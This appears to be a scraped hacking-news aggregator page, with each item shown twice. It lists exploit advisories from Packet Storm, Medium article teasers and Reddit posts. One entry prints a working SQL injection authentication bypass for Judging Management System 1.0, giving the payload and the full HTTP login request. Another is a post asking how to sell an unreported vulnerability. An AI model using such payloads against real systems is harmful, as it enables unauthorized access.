Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
CANAL+ / Microsoft PlayReady Cryptography Shortcomings / Authorization Bypass
https://2.bp.blogspot.com/-3bqdQy169Lk/WWlvCV-tQiI/AAAAAAAAIKk/BK-Yk_ldGYEd1hCc6yCV2jCLaxiytL8_wCLcBGAs/s1600/h127.png
Security Explorations conducted a security analysis of Microsoft Play Ready content protection technology in the environment of the CANAL+ SAT TV provider. As a result, complete access to movie assets and content keys available in the CANAL+ VOD library could be gained with the use of a fake client device identity. Microsoft and CANAL+ have seemingly decided to ignore this large laundry list of failures.
SHA-256 |
Download
Source:packetstormsecurity.com
CANAL+ / Microsoft PlayReady Cryptography Shortcomings / Authorization Bypass
https://2.bp.blogspot.com/-3bqdQy169Lk/WWlvCV-tQiI/AAAAAAAAIKk/BK-Yk_ldGYEd1hCc6yCV2jCLaxiytL8_wCLcBGAs/s1600/h127.png
Security Explorations conducted a security analysis of Microsoft Play Ready content protection technology in the environment of the CANAL+ SAT TV provider. As a result, complete access to movie assets and content keys available in the CANAL+ VOD library could be gained with the use of a fake client device identity. Microsoft and CANAL+ have seemingly decided to ignore this large laundry list of failures.
SHA-256 |
ae147b5df942976857f81fb745ba330474556562626f4e5abf76e56fe99dca24Download
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Judging Management System 1.0 SQL Injection
https://1.bp.blogspot.com/-PwD2Dirg2NY/WWlu3CzGC6I/AAAAAAAAIIs/x87GenQxU4E4sY7pWpFvaHW3XEOYBksJQCLcBGAs/s1600/h10.png
Judging Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
SHA-256 |
Download
Source:packetstormsecurity.com
Judging Management System 1.0 SQL Injection
https://1.bp.blogspot.com/-PwD2Dirg2NY/WWlu3CzGC6I/AAAAAAAAIIs/x87GenQxU4E4sY7pWpFvaHW3XEOYBksJQCLcBGAs/s1600/h10.png
Judging Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
SHA-256 |
52c0e04fae6ca307aa21417a61ea5886413834dee6a4ddc9826d696b899a914aDownload
# Exploit Title: Judging Management System v1.0 - Authentication Bypass
# Date: 12/11/2022
# Exploit Author: Angelo Pio Amirante
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 on XAAMP server
# Vulnerability: An attacker can bypass login page and access to dashboard page
# Vulnerable file: login.php
# Exploit:
1) Go to: http://localhost/php-jms/index.php
2) As username use this payload: 'or 1=1-- -
3) Use random words for password
POST /php-jms/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Origin: http://localhost
Connection: close
Referer: http://localhost/php-jms/index.php
Cookie: wp-settings-time-1=1669938282; _pk_id.1.1fff=9c7644c9d84f46f1.1670232782.
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
username=%27or+1%3D1--+-&password=asa
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
What Measures Should You Take To Keep Your Data Safe Online And/Or Offline?
https://cdn-images-1.medium.com/max/600/1*SOqOMWYodg9pFTXtdVAowA.png
As a responsible and mindful individual, it is important to take measures to keep your personal data safe, both online and offline. This…
Continue reading on Medium »
What Measures Should You Take To Keep Your Data Safe Online And/Or Offline?
https://cdn-images-1.medium.com/max/600/1*SOqOMWYodg9pFTXtdVAowA.png
As a responsible and mindful individual, it is important to take measures to keep your personal data safe, both online and offline. This…
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Machine: Poisoning
https://cdn-images-1.medium.com/max/1073/1*fC5nOxFOQ517Si7tS6mdgQ.png
Se trata de um Pentest black box, onde não temos nenhuma informação além do IP.
Continue reading on Medium »
Machine: Poisoning
https://cdn-images-1.medium.com/max/1073/1*fC5nOxFOQ517Si7tS6mdgQ.png
Se trata de um Pentest black box, onde não temos nenhuma informação além do IP.
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How to Automate Your Bug Bounties
https://cdn-images-1.medium.com/max/2600/0*tdxnITVcL20Mx_VU
TL;DR- Automation is becoming increasingly popular, now that computers and robots can do nearly everything a human can do.
Continue reading on The Gray Area »
How to Automate Your Bug Bounties
https://cdn-images-1.medium.com/max/2600/0*tdxnITVcL20Mx_VU
TL;DR- Automation is becoming increasingly popular, now that computers and robots can do nearly everything a human can do.
Continue reading on The Gray Area »
SUBDOMAIN ENUMERATION
Subdomain enumeration is the process of identifying all subdomains for a given domain. This can be useful for a variety of purposes, such…Continue reading on Medium »
Read more...
Subdomain enumeration is the process of identifying all subdomains for a given domain. This can be useful for a variety of purposes, such…Continue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
What is the best way to monetise a vulnerability without using it?
I tried contacting the company they are unresponsive? I'm thinking of either trying to find a buyer elsewhere or starting a podcast on cyber insecurity and making that episode 1. But what do you guys recommend?
submitted by /u/TristanCGough
[link] [comments]
What is the best way to monetise a vulnerability without using it?
I tried contacting the company they are unresponsive? I'm thinking of either trying to find a buyer elsewhere or starting a podcast on cyber insecurity and making that episode 1. But what do you guys recommend?
submitted by /u/TristanCGough
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Which is your favorite way of studying?
Do you prefer to learn using platforms like TryHackMe or HTB Academy, video courses on platforms like Udemy, perhaps books, all? other?
submitted by /u/jagsec
[link] [comments]
Which is your favorite way of studying?
Do you prefer to learn using platforms like TryHackMe or HTB Academy, video courses on platforms like Udemy, perhaps books, all? other?
submitted by /u/jagsec
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Ransomware on the rise; How to protect yourself?
submitted by /u/No_Arachnid6406
[link] [comments]
Ransomware on the rise; How to protect yourself?
submitted by /u/No_Arachnid6406
[link] [comments]